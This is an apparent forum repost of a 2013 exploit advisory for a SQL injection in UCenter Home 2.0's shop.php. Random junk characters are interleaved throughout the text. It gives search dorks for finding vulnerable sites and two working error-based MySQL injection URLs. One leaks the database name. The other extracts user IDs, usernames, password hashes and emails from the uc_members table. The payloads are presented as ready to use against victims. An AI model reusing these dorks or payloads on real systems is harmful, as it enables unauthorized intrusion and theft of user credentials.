中国网络渗透测试联盟

标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability [打印本页]
作者: admin    时间: 2013-2-27 21:31
标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
8 l6 g4 e' \5 Q7 E8 `6 d  d/ @/ R* G
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
9 u$ y$ ]/ ?) L, y' r7 U0 H' W2 I+ Z4 j" @  M
                                 
+ b2 _  B4 ~- @6 b# y9 R
: o$ Q) J9 y8 N" M: D# v*/ Author : KnocKout  ' E% [3 p" n! ?5 c. @* S
8 @: R* @# f2 l& n0 `+ @; r
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  1 C% b4 a6 O6 ?! J6 L2 R+ m7 z
/ W* _3 e5 Q! D
*/ Contact: knockoutr@msn.com  4 ~- ?# q% O; [, T- m

) Q# ^- H; t% t$ x/ K*/ Cyber-Warrior.org/CWKnocKout  
2 o7 T# n6 w) X1 @& o5 ]: B$ ^, i
  ~6 E% S9 ]8 Z2 Y4 y4 V" y# Y; Z__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  ( d, n3 z1 B: e# w3 }- x: K: k2 v+ m% t
- z+ G: o& X% M' Z% n8 [
Script : UCenter Home  # g1 j8 s4 m- u! y1 |; h

5 ?  d' Q% K1 S2 {Version : 2.0  
/ H5 ~5 J  a- C  Q
! V. Q6 `; a: J* ?& `1 r$ FScript HomePage : http://u.discuz.net/  
" p) a! [5 w3 r& C3 @: z% ?
$ J8 k! ~1 M. Y+ T  B__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
% y8 [. V# w  k+ @- {# ?2 J6 \5 G. H1 k4 O$ F, _3 a
Dork : Powered by UCenter inurl:shop.php?ac=view  
0 p# }" X3 Y$ v6 ^/ q: l
* q$ L/ a- s, PDork 2 : inurl:shop.php?ac=view&shopid=  
8 B8 ]/ d* h) }. \4 }  A% z( M1 N4 Y7 r
) l0 e' X# Y+ U: a, w__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  5 w  k' u; b8 e) |4 S- T% r
/ V0 Y3 p$ x' b
Vuln file : Shop.php  
" j( k% H0 h. u5 B1 k; K6 H. n1 J
value's : (?)ac=view&shopid=  4 A8 g% E( j* ?! n
2 Y- S: X7 Z9 e+ z4 [- O
Vulnerable Style : SQL Injection (MySQL Error Based)  
- l- Y) E- j' I) U, c3 H3 C2 f" ^- _- R' T. W
Need Metarials : Hex Conversion  
& D1 C* y" X# N( r6 t) C
1 u! x! Z( W& h5 v0 m$ a) y__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  , B: @# H: w, A1 X
0 [% Z3 ^8 ~9 a: q
Your Need victim Database name.   ' i# |7 L# I$ \6 h, L; m# u

$ E: t3 W+ n8 ^9 V( w4 o; D0 {: yfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  + `7 a& T4 T) B; n0 _

9 B$ b% R& ~+ U& P# h..  7 G" q7 j/ A9 G6 u$ C8 \
0 V( h# Q( G0 E, i% i: T8 n2 w
DB : Okey.  
6 Y, k3 Z% z+ Y1 W( A3 b& Y$ J- e1 o3 }$ a
your edit DB `[TARGET DB NAME]`  
+ Z# I0 i2 ?+ p# d) C- I4 G
5 ]' ~& y9 J0 w! R2 VExample : 'hiwir1_ucenter'  
7 J2 ~( m5 f7 x2 i7 G. E  H0 @+ z
Edit : Okey.  
4 x) H' a% G4 U7 M* v, A* q% J
9 c( S  w$ Y' Z2 l# @6 I; |  ^1 IYour use Hex conversion. And edit Your SQL Injection Exploit..  % ~% X  O5 V+ @% Z5 C# c
! G# x( z1 K8 T
   
  U( q3 o0 `  r# I& r/ ]" l7 K& @# B% m( t# Z% V$ \
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  ! f- r0 ?; D! E2 R, D1 v+ }




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2